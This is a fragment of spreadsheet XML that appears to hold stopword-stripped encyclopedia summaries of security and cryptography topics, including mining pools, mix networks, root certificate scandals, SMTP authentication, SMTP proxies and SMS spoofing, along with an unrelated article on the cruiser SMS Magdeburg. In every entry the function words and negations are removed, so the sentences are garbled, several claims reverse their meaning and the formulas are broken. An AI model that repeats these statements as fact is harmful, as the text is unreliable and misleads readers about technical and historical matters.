note however untrusted node case able reduce subset links, all, selectively delaying links. compared average (i.e., rtt/2), protocol never returns estimate smaller forward reverse larger returned average method. additionally, probability distribution absolute error protocol derived function underlying delay distribution. this useful enables calculation expected error knowing nature delays links untrusted node trusted ones. also network delay end-to-end delay round-trip time trusted system references</t>
  </si>
  <si>
    <t>Mining pool</t>
  </si>
  <si>
    <t>context cryptocurrency mining, mining pool pooling resources miners, share processing power network, split reward equally, according amount work contributed probability finding block. "share" awarded members mining pool present valid partial proof-of-work. mining pools began difficulty mining increased point could take centuries slower miners generate block. solution problem miners pool resources could generate blocks quickly therefore receive portion block reward consistent basis, rather randomly every years. history november 2010: slush launched 2010 first mining pool. 2011–2013: deepbit, peak held network hashrate. 2013–2014: since introduction asic, deepbit failed support newer stratum protocol, ghash.io replaced deepbit became largest. 2014–2015: f2pool, launched 2013, overtook ghash.io became largest mining pool. 2016–2018: rise bitmain antpool. bitmain also controls smaller pools like btc.com viabtc. 2019–2020: launch poolin. poolin f2pool held network hashrate time period, smaller pools following. 2020: binance launches mining pool, following huobi okex. luxor launches us-based mining pool. mining pool share share principal concept mining pool operation. share potential block solution. block solution, necessarily example, suppose block solution number ends zeros and, share number zeros end. sooner later shares zeros end, block solution. mining pools need shares estimate miner's contribution work performed pool find block. there numerous miner reward systems: pps, prop, pplns, pplnt, many more. mining pool methods mining pools contain hundreds thousands miners using specialized protocols. schemes {\displaystyle stands block reward minus pool {\displaystyle probability finding block share attempt {\displaystyle p=1/d} {\displaystyle current block difficulty). pool support "variable share difficulty" feature, means miner select share target (the lower bound share difficulty) change {\displaystyle accordingly. pay-per-share pay-per-share (pps) approach offers instant, guaranteed payout miner contribution probability pool finds block. miners paid pool's existing balance withdraw payout immediately. this model allows least possible variance payment miners also transferring much risk pool's operator. each share costs exactly expected value hash attempt {\displaystyle r=b\cdot proportional miners earn shares pool finds block (the mining round). after user gets reward {\displaystyle r=b\cdot {\frac {n}{n}}} {\displaystyle amount shares, {\displaystyle amount shares round. words, shares equal, value calculated round. pooled mining pooled mining (bpm), also known "slush's system", first pool called "slush's pool', uses system older shares beginning block round given less weight recent shares. round starts moment pool solves block miners rewarded proportional shares submitted. this reduces ability cheat mining pool system switching pools round, maximize profit. pay-per-last-n-shares pay-per-last-n-shares (pplns) method similar proportional, miner's reward calculated basis last shares, instead shares last round. means block found, reward miner calculated based miner contribution last pool shares. therefore, round short enough miners profit vice versa. solo mining pool solo pools operate usual pools, difference block reward distributed among miners. entire reward solo pool goes miner finds block. peer-to-peer mining pool peer-to-peer mining pool (p2pool) decentralizes responsibilities pool server, removing chance pool operator cheating server single point failure. miners work side blockchain called share chain, mining lower difficulty rate share block seconds. once share block reaches network target, transmitted merged onto blockchain. miners rewarded occurs proportional shares submitted prior target block. p2pool requires miners full node, bearing weight hardware expenses network bandwidth. geometric method geometric method (gm) invented meni rosenfeld. based "score" idea, slush's method: score granted every share, relatively already existing score score future shares, always same, thus advantage mining early late round. method goes follows: choose parameters {\displaystyle {\displaystyle (fixed variable fee). start every round, {\displaystyle s=1} every worker {\displaystyle {\displaystyle s_{k}} worker's score round, {\displaystyle s_{k}=0} {\displaystyle r=1-p+{\frac {p}{c}}} {\displaystyle p=1/d} difficulty changes round, {\displaystyle needs updated. when worker {\displaystyle submits share, {\displaystyle s_{k}=s_{k}+spb} {\displaystyle s=sr} share valid block, round. every worker {\displaystyle {\displaystyle {\frac {(1-f)(r-1)s_{k}}{sp}}} double geometric method generalized version geometric pplns methods. involves parameter: {\displaystyle ("cross-round leakage"). when {\displaystyle o=0} becomes geometric method. when {\displaystyle o=1} becomes variant pplns, exponential decay instead step function. choose parameters {\displaystyle {\displaystyle {\displaystyle when pool first starts running, initialize {\displaystyle s=1} every worker {\displaystyle {\displaystyle s_{k}} worker's score, {\displaystyle s_{k}=0} {\displaystyle r=1+{\frac {1}{c}}p(1-c)(1-o)} point difficulty parameters change, {\displaystyle recalculated. when worker {\displaystyle submits share, {\displaystyle s_{k}=s_{k}+(1-f)(1-c)spb} (where {\displaystyle block reward time submitted), {\displaystyle s=sr} share valid block, also following worker {\displaystyle give payout {\displaystyle {\frac {1}{c_{s}}}(1-o)s_{k}} {\displaystyle s_{k}=s_{k}\cdot transaction fees usually, blocks cryptocurrency network contain transactions. transaction fees paid miner (mining pool). different mining pools could share fees miners not. pay-per-last-n-shares (pplns), pay-per-share plus (pps+) full pay-per-share (fpps) fair methods payouts pool include block subsidy also transaction fees. multipool mining multipools switch different altcoins constantly calculate coin moment profitable mine. factors involved algorithm calculates profitability, block time, price exchanges. avoid need many different wallets possible minable coins, multipools automatically exchange mined coin coin accepted mainstream (for example bitcoin). using method, profitable coins mined sold intended coin, possible receive coins intended currency mining currency alone. this method also increases demand intended coin, side effect increasing stabilizing value intended coin.some companies sell hash power aggregating work many small miners (for example, nicehash), paying proportionally share like pool would. some companies operate pools. these considered multipools, usually employ similar method work switching, although work assign determined customer demand rather "raw" profitability. mining similar mining technologies, poc, poc+, proof space method allows computing performed beforehand answers stored miners hard drive, heavy energy consumption required like mining therefore almost always environmentally friendly blockchain choice. when mining happens miner simply "looks" pre-stored answers submits best found network, minimal energy used read hard drives. hardware specification requirements mining process, type mining conducted regular still used day-to-day tasks. first blockchain brought online 2014 known signum today, chains coming much later, examples: chia, flax, bitcoinhd. network difficulty, well network mining status information, viewed public mining pool dashboards, example: mining pool dashboard list current poc, pos, poc+ type mining pools also tracked third party "mining pool stats" pages, example mining pool stats. also cryptographic protocol digital currency exchanger electronic money references external links bitcoin pooled miner pooled mining bitcoin wiki estimation hashrate distribution amongst largest mining pools first blockchain example poc+ mining pool example mining pool stats tracking site</t>
  </si>
  <si>
    <t>Mir-1</t>
  </si>
  <si>
    <t>cryptography, mir-1 stream cypher algorithm developed alexander maximov. submitted estream project ecrypt network. selected focus consideration phase 'archived'. references</t>
  </si>
  <si>
    <t>Rockex</t>
  </si>
  <si>
    <t>rockex, telekrypton, offline one-time tape vernam cipher machine known used britain canada 1943. developed canadian electrical engineer benjamin deforest bayly, working british security coordination."rockex" named rockefeller center, together tradition naming british cipher equipment suffix "-ex" (e.g. typex). 1944 improved rockex first appeared. there also mark mark after used british consulates embassies 1973, although continued mid-1980s.after rockex machines code tapes manufactured great secrecy control secret intelligence service (sis), also known mi6, small factory number chester road, borehamwood northern outskirts london. minimise number people knew process, mi6's head communications, brigadier richard gambier-parry, took personal lease factory buildings employed people local labour exchange entirely private venture ostensibly unconnected government. product sold government departments used machines. this discovered treasury 1951 concerned form financial auditing ever exercised organisation. treasury officials eventually convinced factory needed treated special case allowed continue privately special arrangement secret auditing (natl archives file t220/1444) references external links jerry proc's page rockex rockex crypto museum website 5-uco also noreen</t>
  </si>
  <si>
    <t>Mix network</t>
  </si>
  <si>
    <t>networks routing protocols create hard-to-trace communications using chain proxy servers known mixes take messages multiple senders, shuffle them, send back random order next destination (possibly another node). this breaks link source request destination, making harder eavesdroppers trace end-to-end communications. furthermore, mixes know node immediately received message from, immediate destination send shuffled messages making network resistant malicious nodes.each message encrypted proxy using public cryptography; resulting encryption layered like russian doll (except "doll" size) message innermost layer. each proxy server strips layer encryption reveal send message next. proxy servers compromised tracer, untraceability still achieved weaker adversaries. concept networks first described david chaum 1981. applications based concept include anonymous remailers (such mixmaster), onion routing, garlic routing, key-based routing (including tor, i2p, freenet). history david chaum published concept networks 1979 paper: "untraceable electronic mail, return addresses, digital pseudonyms". paper master's degree thesis work, shortly first introduced field cryptography work public cryptography, martin hellman, whitfield diffie ralph merkle. while public cryptography encrypted security information, chaum believed personal privacy vulnerabilities meta data found communications. some vulnerabilities enabled compromise personal privacy included time messages sent received, size messages address original sender. cites martin hellman whitfield's paper "new directions cryptography" (1976) work. works participant prepares message delivery participant appending random value message, sealing addressee's public {\displaystyle k_{b}} appending address, sealing result mix's public {\displaystyle k_{m}} opens private key, knows address, sends {\displaystyle k_{b}(message,r)} message format {\displaystyle k_{m}(r1,k_{b}(r0,message),b)\longrightarrow (k_{b}(r0,message),b)} accomplish this, sender takes mix's public {\displaystyle k_{m}} uses encrypt envelope containing random string {\displaystyle nested envelope addressed recipient, email address recipient (b). this nested envelope encrypted recipient's public {\displaystyle k_{b}} contains another random string (r0), along body message sent. upon receipt encrypted top-level envelope, uses secret open inside, finds address recipient encrypted message bound random string {\displaystyle discarded. {\displaystyle needed message order prevent attacker guessing messages. assumed attacker observe incoming outgoing messages. random string used (i.e. {\displaystyle (k_{b}(message))} sent {\displaystyle attacker good guess message {\displaystyle message'} sent, test whether {\displaystyle k_{b}(message')=k_{b}(message)} holds, whereby learn content message. appending random string {\displaystyle attacker prevented performing kind attack; even guess correct message (i.e. {\displaystyle message'=message} true) learn right since know secret value {\displaystyle practically, {\displaystyle functions salt. return addresses what needed respond still keeping identity secret solution form untraceable return address {\displaystyle k_{m}(s1,a),k_{x}} {\displaystyle real address, {\displaystyle k_{x}} public one-time chosen current occasion only, {\displaystyle also random string purposes sealing. then, send return address part message sent techniques already described. sends {\displaystyle k_{m}(s1,a),k_{x}(s0,response)} transforms {\displaystyle a,s1(k_{x}(s0,response))} this uses string bits {\displaystyle finds decrypting address part {\displaystyle k_{m}(s1,a)} re-encrypt message part {\displaystyle k_{x}(s0,response)} only addressee, decrypt resulting output created {\displaystyle {\displaystyle k_{x}} additional {\displaystyle k_{x}} assures cannot content reply-message. following indicates uses untraceable return address form response kind mix: message {\displaystyle \longrightarrow {\displaystyle k_{m}(r1,k_{b}(r0,message,k_{m}(s1,a),k_{x}),b)\longrightarrow k_{b}(r0,message,k_{m}(s1,a),k_{x})} reply message {\displaystyle \longrightarrow {\displaystyle k_{m}(s1,a),k_{x}(s0,response)\longrightarrow a,s1(k_{x}(s0,response))} where: {\displaystyle k_{b}} public key, {\displaystyle k_{m}} mix's public key. destination reply source without sacrificing source anonymity. reply message shares performance security benefits anonymous messages source destination. vulnerabilities although networks provide security even adversary able view entire path, mixing absolutely perfect. adversaries provide long term correlation attacks track sender receiver packets. threat model adversary perform passive attack monitoring traffic network. analyzing arrival times multiple packets reveal information. since changes actively made packets, attack like hard detect. worst case attack, assume links network observable adversary strategies infrastructure network known. packet input link cannot correlated packet output link based information time packet received, size packet, content packet. packet correlation based packet timing prevented batching correlation based content packet size prevented encryption packet padding, respectively. inter-packet intervals, time difference observation consecutive packets network links, used infer links carry connection. encryption padding affect inter-packet interval related flow. sequences inter-packet interval vary greatly connections, example browsing, traffic occurs bursts. this fact used identify connection. active attack active attacks performed injecting bursts packets contain unique timing signatures targeted flow. attacker perform attacks attempt identify packets network links. attacker might able create packets required knowledge symmetric keys subsequent mixes. replay packets cannot used either easily preventable hashing caching. artificial large gaps created target flow, attacker drops large volumes consecutive packets flow. example, simulation sending 3000 packets target flow, attacker drops packets second start flow. number consecutive packets dropped increases, effectiveness defensive dropping decreases significantly. introducing large almost always create recognizable feature. artificial bursts attacker create artificial bursts. this done creating signature artificial packets holding link certain period time releasing once. defensive dropping provides defense scenario attacker identify target flow. there defense measures taken prevent attack. solution adaptive padding algorithms. packets delayed, easier identify behavior thus better defense observed. other time analysis attacks attacker also look timing attacks inter-packet intervals. attacker actively modify packet streams observe changes caused network's behavior. packets corrupted force re-transmission packets, behavior easily observable reveal information. sleeper attack assuming adversary messages sent received threshold mixes can't internal working mixes sent same. adversary left messages respective mixes receive two, able determine message sent corresponding sender. adversary place messages (active component) given time messages must remain prior message sent. this typically active attack. weaker adversaries attack combination attacks cause issues. networks derive security changing order messages receive avoid creating significant relation incoming outgoing messages. mixes create interference messages. interference puts bounds rate information leak observer mix. size adversary observing input output uncertainty order determining match. sleeper attack take advantage this. layered network threshold mixes sleeper mix, layer receiving inputs senders second layer mixes forward messages final destination. from this, attacker learn received message could come sender layer fire. there higher probability matching sent received messages sleepers thus communication completely anonymous. mixes also purely timed: randomize order messages received particular interval attach mixes, forwarding interval despite received interval. messages available mixinthat interfere, messages available, interference received messages. references</t>
  </si>
  <si>
    <t>Root certificate</t>
  </si>
  <si>
    <t>cryptography computer security, root certificate public certificate identifies root certificate authority (ca). root certificates self-signed (and possible certificate multiple trust paths, certificate issued root cross-signed) form basis x.509-based public infrastructure (pki). either matched authority identifier subject identifier, cases authority identifier, issuer string match subject string (rfc 5280). instance, pkis supporting https secure browsing electronic signature schemes depend root certificates. certificate authority issue multiple certificates form tree structure. root certificate top-most certificate tree, private used "sign" certificates. certificates signed root certificate, "ca" field true, inherit trustworthiness root certificate—a signature root certificate somewhat analogous "notarizing" identity physical world. such certificate called intermediate certificate subordinate certificate. certificates tree also depend trustworthiness intermediates. root certificate usually made trustworthy mechanism certificate, secure physical distribution. example, best-known root certificates distributed operating systems manufacturers. microsoft distributes root certificates belonging members microsoft root certificate program windows desktops windows phone apple distributes root certificates belonging members root program. incidents root certificate misuse diginotar hack 2011 2011, dutch certificate authority diginotar suffered security breach. this issuing various fraudulent certificates, among others abused target iranian gmail users. trust diginotar certificates retracted operational management company taken dutch government. china internet network information center (cnnic) issuance fake certificates 2009, employee china internet network information center (cnnic) applied mozilla cnnic mozilla's root certificate list approved. later, microsoft also added cnnic root certificate list windows. 2015, many users chose trust digital certificates issued cnnic intermediate issued cnnic found issued fake certificates google domain names raised concerns cnnic's abuse certificate issuing power.on april 2015, google announced longer recognized electronic certificate issued cnnic. april following google, mozilla also announced longer recognized electronic certificate issued cnnic. august 2016, official website cnnic abandoned root certificate issued replaced certificate issued digicert-issued certificate. wosign startcom: issuing fake backdating certificates 2016, wosign, china's largest certificate issuer owned qihoo israeli subsidiary startcom, denied recognition certificates google. wosign startcom revealed issued hundreds certificates serial number five days, well issuing backdating certificates. wosign startcom even issued fake github certificate.microsoft also said 2017 would remove relevant certificates offline, february 2021 users still reported certificates wosign startcom still effective windows could removed manually. also online certificate status protocol (ocsp) sha-1 timestamping verisign references</t>
  </si>
  <si>
    <t>Mary Hughes Budenbach</t>
  </si>
  <si>
    <t>mary caroline "polly" hughes budenbach (april 1914 june 2005) american cryptanalyst. federal woman's award 1969, posthumously inducted hall honor 2017. early life education mary caroline hughes born york city raised scotch plains, jersey, daughter harold lincoln hughes jane plunkett hughes. attended hartridge school graduated smith college 1934, bachelor's degree english. career during world budenbach worked cryptanalyst united states navy washington, d.c., focused japanese naval cryptosystems. after war, continued working cryptanalyst consultant. after 1953, senior cryptologist, administrator, and, point, highest-paid woman national security agency (nsa), based fort george meade maryland. worked computerizing analytical tasks cryptology, chaired committee promotion assignment women nsa. described work 1969 "challenging, fascinating, interesting frustrating, romantic."budenbach recognized navy's meritorious civilian service award 1945. 1969, received federal woman's award. "when heard award, many friends came said 'now know work'," told reporter 1969. 1975, year retired nsa, received agency's exceptional civilian service award. personal life mary hughes married stockbroker theodore oswald budenbach 1940. died 1982. died jersey 2005, aged years. posthumous honors budenbach's story included book code girls: untold story american women code breakers world (2017), liza mundy. also 2017, posthumously inducted hall honor. references</t>
  </si>
  <si>
    <t>SAFARI</t>
  </si>
  <si>
    <t>safari attempt french government, presidency georges pompidou, create centralized database personal data. database supposed interconnect data, particular insee code (also used social security number). march 1974, article newspaper monde brought public attention project. massive popular rejection project promoted creation cnil ensure data privacy. safari stands système automatisé pour fichiers administratifs répertoire individus, "automated system administrative files repertory individuals". also government databases french political scandals</t>
  </si>
  <si>
    <t>Messaging security</t>
  </si>
  <si>
    <t>messaging security program provides protection companies' messaging infrastructure. programs includes reputation-based anti-spam, pattern-based anti-spam, administrator defined block/allow lists, mail antivirus, zero-hour malware detection email intrusion prevention. dimensions comprehensive messaging security ip-reputation anti-spam checks email connection request database addresses establish whether sender legitimate known spam sender malware. sender recognize undesirable messaging security program drops connection message accepted. pattern-based anti-spam utilizes proprietary algorithm establish fingerprint-like signature email messages. when message comes pattern calculated checked database determine message matches known email pattern. this approach provides content agnostic protection blocks spam without looking actual message content. block/allow list anti-spam administrators create list addresses domains would like either block allow. this method ensures trusted sources explicitly allowed unwanted sources explicitly denied access. mail antivirus this layer protection blocks wide range known virus malware attacks. zero-hour malware protection analyzing large numbers messages, outbreaks detected along corresponding messages. these message patterns flagged malicious, giving information given attack. with information, outbreaks blocked signature available, protecting network critical period attack development. smartdefense email messaging security program utilizes smartdefense email stop attacks targeting messaging infrastructure. such attacks gain access protected network, bring piece messaging infrastructure, utilize messaging infrastructure resource launching attacks. characteristics messaging security protection advanced spam image-based multi-language spam. antivirus protection combination zero-hour signature-based detection. solution messaging security content language-independent. advanced, real-time ip-reputation service. on-session email blocking (emails checked blocked original smtp/pop3 session). also firewall unified threat management virtual firewall circuit-level gateway sandbox (computer security) screened-subnet firewall references</t>
  </si>
  <si>
    <t>SMTP-AUTH</t>
  </si>
  <si>
    <t>smtp authentication, often abbreviated smtp auth, extension simple mail transfer protocol (smtp) whereby client using authentication mechanism supported server. mainly used submission servers, authentication mandatory. history smtp specified postel 1970s provide using passwords sending email messages; server design open mail relay. result, spam worms, initially problem, become plague late '90s. before smtp auth, relay client identified address, practical email services provided internet service provider (isp) supplying connection, else using specific hacks, smtp. john gardiner myers published first draft smtp auth 1995, successively developed discussed ietf along mail submission protocol, extended smtp (esmtp), simple authentication security layer (sasl). older sasl mechanism esmtp authentication (esmtpa) cram-md5, uses algorithm hmacs (hash-based message authentication codes) still considered sound.the internet mail consortium (imc) reported mail servers open relays 1998, less 2002. role mail transport system using mail submission agent (msa), generally port 587, implies smtp auth. usage supported software recommended, especially support nomadic users, several network hubs either block port smtp proxies. responsible ensuring message envelope contains good addresses, enforce local policies from header field. verifying envelope sender (a.k.a. return-path) used from address agree authenticated user-id particularly important domains sign messages using dkim. keywords ending esmtpa esmtpsa, provided clause received header fields, messages received smtp auth. "the keywords provided statistical diagnostic purposes" (rfc 3848); checked clients, e.g. spamassassin. details smtp extensions, smtp auth advertised ehlo response, along list supported authentication methods. these methods change issuing starttls, typically allowing plain text passwords latter case only. 4954 provides following example ("c:" "s:" part protocol, indicate lines sent client server, respectively): smtp.example.com esmtp server ehlo client.example.com 250-smtp.example.com hello client.example.com 250-auth gssapi digest-md5 250-enhancedstatuscodes starttls starttls ready start negotiation proceeds. further commands protected layer ehlo client.example.com 250-smtp.example.com hello client.example.com auth gssapi digest-md5 plain auth plain dgvzdab0zxn0adeymzq= 2.7.0 authentication successful smtp auth used also port usually, servers reject rcpt commands imply relaying unless authentication credentials accepted. specification recommends servers issue 5.7.0 authentication required response commands case server configured require authentication client done yet. only servers listening port 587, private servers, configured way, message exchange (mx). however, historical trait smtp authenticated default results different behavior regard access protocols, cases; example, using auth external starttls.besides auth command, extension also provides auth parameter mail from command, allow distinguish authentication authorization. that way, sender identify transmit several messages session. while authentication need vary, established, different messages sent according different agreements hence require different authorization. example, messages relayed behalf different users. parameter much less popular using command grant relay privileges. smtp authentication "extension" smtp terms, requires server client ehlo verb greeting indicate support extensions, opposed obsolete helo greeting. backward compatibility, helo greeting accepted extension used. capitalized text auth command list types authorization smtp server accept. some examples authorization protocols include: plain (uses base64 encoding) login (uses base64 encoding) gssapi (generic security services application program interface) digest-md5 (digest access authentication) cram-md5 oauth10a (oauth 1.0a hmac-sha1 tokens defined 5849) oauthbearer (oauth bearer tokens defined 6750) xoauth2 standards 3207, smtp service extension secure smtp transport layer security, paul hoffman, february 2002. 3848, esmtp lmtp transmission types registration, chris newman, july 2004. 6409, message submission mail, randall gellens john klensin, november 2011 (obsoletes 4409, 2006, turn replaced 2476, december 1998). 4422, simple authentication security layer (sasl), alexey melnikov kurt zeilenga, june 2006. 4616, plain sasl mechanism, zeilenga, ed., august 2006. 4954, smtp service extension authentication, robert siemborski alexey melnikov, july 2007. 7628, simple authentication security layer (sasl) mechanisms oauth, mills, showalter tschofenig, august 2015. other erwin hoffmann, smtp authentication [tutorial], last edit 2017-01-10. also e-mail authentication simple mail transfer protocol mail submission agent email client port numbers simple authentication security layer open mail relay smtp references</t>
  </si>
  <si>
    <t>SMTP proxy</t>
  </si>
  <si>
    <t>smtp proxies specialized mail transfer agents (mtas) that, similar types proxy servers, pass smtp sessions mtas without using store-and-forward approach typical mta. when smtp proxy receives connection, initiates another smtp session destination mta. errors status information destination passed back sending proxy. uses smtp proxies commonly used process filter inbound outbound email traffic. inbound smtp proxying smtp proxies often serve initial, network-facing layer email system, processing smtp connections clients forwarding data second layer mail servers. smtp proxies often implement first and/or layer defence inbound anti-spam filtering system, analyze messages using spam content filter antivirus program, block rate limit connections using blacklists reputation systems, load-balance smtp connections prevent overloading mail servers. advantages smtp proxying because smtp proxies store messages like mail transfer agent (mta) does, reject smtp connections message content real-time, away need out-of-band non-delivery reports (ndrs), cause backscatter email, serious problem internet email system. certain smtp proxies implement connection management (otherwise known flow control), help reduce damage downstream mail servers resulting spikes traffic malicious smtp clients. connection management context smtp typically involves bandwidth throttling and/or introducing delays smtp command responses (this also known tarpitting). when slowed down, certain malicious sources smtp traffic spambots tend give rather continuing deliver full email message.network tarpitting challenging implement within email server, since smtp connection processed slowly normal, often holding precious system resources memory cpu. because smtp proxies implemented using lighter-weight programming techniques asynchronous (for example nginx, node.js, netty libevent), thousands connections juggled using resources much smaller number connections context full-blown store-and-forward email server. outbound smtp proxying smtp proxies sometimes inserted sending mail servers local network, receiving counterparts internet. smtp proxies often used context order filter outgoing spam; however, applications domainkeys identified mail (dkim) signing also exist types smtp proxies smtp proxies come fundamental flavors: synchronous smtp client connection causes proxy establish single connection downstream mail server. open-source smtp-gated project example synchronous smtp proxy. multiplexing proxy establishes downstream connections mail server needed, intelligently juggling pool smtp connections; juggling protects downstream mail server excessive connection concurrency. transparent proxy inserted network clients servers, masquerading client server believe talking directly other, even though proxy middle. commercial "mailchannels outbound" product mailchannels implements transparent proxy. policy-based routing used route smtp traffic transparent smtp proxy. also anti-spam smtp proxy mailchannels turntide references</t>
  </si>
  <si>
    <t>SMTP Authentication</t>
  </si>
  <si>
    <t>SMS spoofing</t>
  </si>
  <si>
    <t>spoofing technology uses short message service (sms), available mobile phones personal digital assistants, message appears come replacing originating mobile number (sender alphanumeric text. spoofing legitimate uses (setting company name message sent, setting mobile number, product name) illegitimate uses (such impersonating another person, company, product). this also send "mysterious" messages look like legitimate numbers contacts. spoofing carried spoofing occurs sender manipulates address information. often done order impersonate user roamed onto foreign network submitting messages home network. frequently, messages addressed destinations outside home network home smsc essentially “hijacked” send messages networks. advanced cases even hijack existing contacts phone. words, message number want impact activity threefold: home network incur termination charges caused delivery messages interconnect partners. these messages concern interconnect partners. their customers complain spammed, content messages politically sensitive. interconnect partners threaten home network unless remedy implemented. home subscribers unable send messages networks. while fraudsters normally used spoofed-identities send messages, risk identities match real home subscribers. risk therefore emerges, genuine subscribers billed roaming messages send. situation occurs, integrity home operator’s billing process compromised, potentially huge impact brand.the legitimate cases spoofing include: sender transmits message online computer network lower competitive pricing, ease data entry full size console. they must spoof number order properly identify themselves. sender mobile phone, need send number provided receiver advance means activate account. sender adopts default network gateway identifier provided online service, order send anonymous sms, rather specifying number choosing. third party sends message virtual number, forwards (resends) message recipients true originator address (rather virtual number) appears sender recipient(s) reply, call, sort, save, otherwise process message expected way.an spoofing attack often first detected increase number errors encountered bill-run. these errors caused spoofed subscriber identities. operators respond blocking different source addresses gateway-mscs, fraudsters change addresses easily by-pass measures. fraudsters move using source addresses major interconnect partner, become unfeasible block addresses, potential impact normal interconnect services. legality 2007, premium rate regulator, phonepayplus (formerly icstis) concluded public consultation anonymous sms, stated averse operation services. however, 2008 phonepayplus introduced regulation covering anonymous sms, requiring anonymous service providers send follow-up message recipient stating spoofed sent them, operate complaints helpline. protecting users spoofing user prove sessions spoofed, contact enforcement cellular provider, able track messages actually sent from. user also modify phone's settings messages authorized numbers allowed. this always effective since hackers could impersonating user's friends well. references</t>
  </si>
  <si>
    <t>SMS Magdeburg</t>
  </si>
  <si>
    <t>magdeburg ("his majesty's ship magdeburg") lead ship magdeburg class light cruisers german kaiserliche marine (imperial navy). class included three ships: breslau, strassburg, stralsund. magdeburg built weser shipyard bremen 1910 august 1912, commissioned high seas fleet. ship armed main battery twelve 10.5 l/45 guns speed 27.5 knots (50.9 km/h; 31.6 mph). magdeburg used torpedo test ship commissioning outbreak world august 1914, brought active service deployed baltic. baltic, magdeburg fired first shots russians august, shelled port libau. participated series bombardments russian positions late august. 26th, participated sweep entrance gulf finland; steaming estonian coast, aground island odensholm could freed. pair russian cruisers appeared seized ship. fifteen crew members killed brief engagement. they recovered three intact german code books, passed british. ability decrypt german wireless signals provided british ability ambush german units several occasions war, including battle jutland. russians partially scrapped magdeburg remained grounded completely destroying wreck. design magdeburg 138.7 meters (455 long overall beam 13.5 draft forward. displaced 4,535 (4,463 long tons) normally 4,570 (4,500 long tons) full load. propulsion system consisted three sets bergmann steam turbines driving three screw propellers. they designed give 25,000 shaft horsepower (19,000 kw), reached 29,904 (22,299 service. these powered sixteen coal-fired marine-type water-tube boilers, although later altered fuel sprayed coal increase burn rate. these gave ship speed 27.6 knots (51.1 km/h; 31.8 mph). magdeburg carried 1,200 (1,200 long tons) coal, additional (104 long tons) gave range approximately 5,820 nautical miles (10,780 6,700 knots km/h; mph). crew officers enlisted men.the ship armed main battery twelve 10.5 (4.1 l/45 guns single pedestal mounts. placed side side forward forecastle, eight located amidships, four either side, side side aft. guns maximum elevation degrees, allowed engage targets 12,700 (41,700 ft). they supplied 1,800 rounds ammunition, shells gun. also equipped pair (19.7 torpedo tubes five torpedoes; tubes submerged hull broadside. could also carry mines. ship protected waterline armored belt (2.4 thick amidships. conning tower (3.9 thick sides, deck covered thick armor plate. service history magdeburg ordered contract name "ersatz bussard"; order awarded weser shipyard bremen december 1909. laid april 1910 launched 1911, ceremony, christened mayor namesake city. after completing fitting-out work, began short period builder's trials august 1912 commissioned high seas fleet eight days later, command fregattenkapitän (fk—frigate captain) heinrich rohardt. ship conducted initial tests without forward funnel installed. after completing initial trials, magdeburg used torpedo test ship december, replacing light cruiser augsburg role. later year, embarked cruise baltic vessels organized training squadron.another cruise took place early april 1913, june, joined fleet annual cruise norwegian waters. august, magdeburg went another fleet cruise central atlantic, steaming south tenerife canary islands. during cruise, participated experiments wireless telegraphy. following fleet's return home waters, annual large-scale fleet maneuvers took place north sea. magdeburg thereafter went danzig overhaul lasted mid-september late october. resumed torpedo test duties october, joined fleet exercises kattegat later year, went another training cruise baltic december. year 1914 began exercises training squadron. europe drifted toward july crisis, magdeburg ordered patrol kiel help secure port's defenses. during patrol july, encountered french dreadnought battleships france jean bart, taken french president raymond poincaré visit russia. world following outbreak world july, assigned coastal defense division baltic sea, command rear admiral robert mischke. offensiv streitkraft (offensive force) created magdeburg, augsburg, torpedo boats v25, v26, v186 operations russian forces area. ships sent neufahrwassar july. magdeburg fired first shots russia august shelled russian port libau augsburg laid minefield outside russia's forward naval base. russians fact already left libau, seized german army. minefield laid augsburg poorly marked hindered german operations russian efforts. from august, magdeburg patrolled southern entrance gulf riga, north libau. joined rest coastal defense division, sent north attack russian positions finland lasted august. during attacks, magdeburg shelled ristna lighthouse dagerort. also attacked bengtskär lighthouse signal station pistna.on august, magdeburg, augsburg, three torpedo boats, sortied escort minelayer deutschland, next day, encountered pair powerful russian armored cruisers, admiral makarov gromoboi. russian commander, mistaken assumption german armored cruisers roon prinz heinrich present, attack forces withdrew. after arriving danzig august, offensiv streitkraft reorganized verband "detachierten admirals" (unit detached admiral). prince heinrich, overall commander baltic naval forces, replaced mischke konteradmiral (rear admiral) ehler behring. commander immediately began planning make sortie toward gotland search russian vessels. behring ordered operation august sweep russian reconnaissance forces entrance gulf finland; magdeburg also bombard signal station odensholm estonian coast. magdeburg underway previous arrive area prescribed time. encountered heavy early hours august steaming speed knots km/h; mph), 01:13, aground near lighthouse odensholm. ship's double bottom badly damaged unable free herself. crew attempted lighten ship throwing equipment overboard, vessel remained hard aground. torpedo boat arrived around 08:30 attempted pull free unable therefore began taking part magdeburg's crew preparation abandon wreck. since cruiser gone ashore near lighthouse, targets planned bombardment, destroyed gunfire spite predicament.while evacuation going russian cruisers bogatyr pallada appeared around 09:00, alerted situation signal station magdeburg unable destroy. reaching area, opened fire stranded cruiser. germans destroyed forward section ship, could complete destruction russians reached ship. fifteen crew members magdeburg killed attack, ship's captain adjutant remained aboard captured russians; remained russian prisoner camp march 1918, able escape return germany. german code books also destroyed; russians able recover three books along current encryption key. they passed copy british royal navy pair russian couriers october. russian navy partially scrapped ship situ eventually destroyed wreck.the capture code books proved provide significant advantage royal navy. admiralty recently created deciphering department known room process intercepted german wireless signals. with code books cipher key, british able track movements german warships; information could passed admiral john jellicoe, commander grand fleet. this allowed british ambush parts entire german fleet several occasions, successfully battles dogger bank january 1915 jutland 1916. notes footnotes citations references campbell, sieche, erwin (1986). "germany". gardiner, robert gray, randal (eds.). conway's world's fighting ships, 1906–1921. london: conway maritime press. 134–189. isbn 978-0-85177-245-5. gröner, erich (1990). german warships: 1815–1945. vol. major surface vessels. annapolis: naval institute press. isbn 978-0-87021-790-6. halpern, paul (1995). naval history world annapolis: naval institute press. isbn 978-1-55750-352-7. herwig, holger (1980). "luxury" fleet: imperial german navy 1888–1918. amherst: humanity books. isbn 978-1-57392-286-9. hildebrand, hans röhr, albert steinmetz, hans-otto (1993). deutschen kriegsschiffe: biographien: spiegel marinegeschichte 1815 gegenwart [the german warships: biographies: reflection naval history 1815 present] german). vol. ratingen: mundus verlag. isbn 978-3-7822-0237-4. further reading mäkelä, matti (1984). geheimnis "magdeburg": geschichte kleinen kreuzers bedeutung seiner signalbücher ersten weltkrieg [the secret magdeburg: history light cruiser significance signal book world german). koblenz: bernard graefe verlag.</t>
  </si>
  <si>
    <t>SM9 (cryptography standard)</t>
  </si>
  <si>
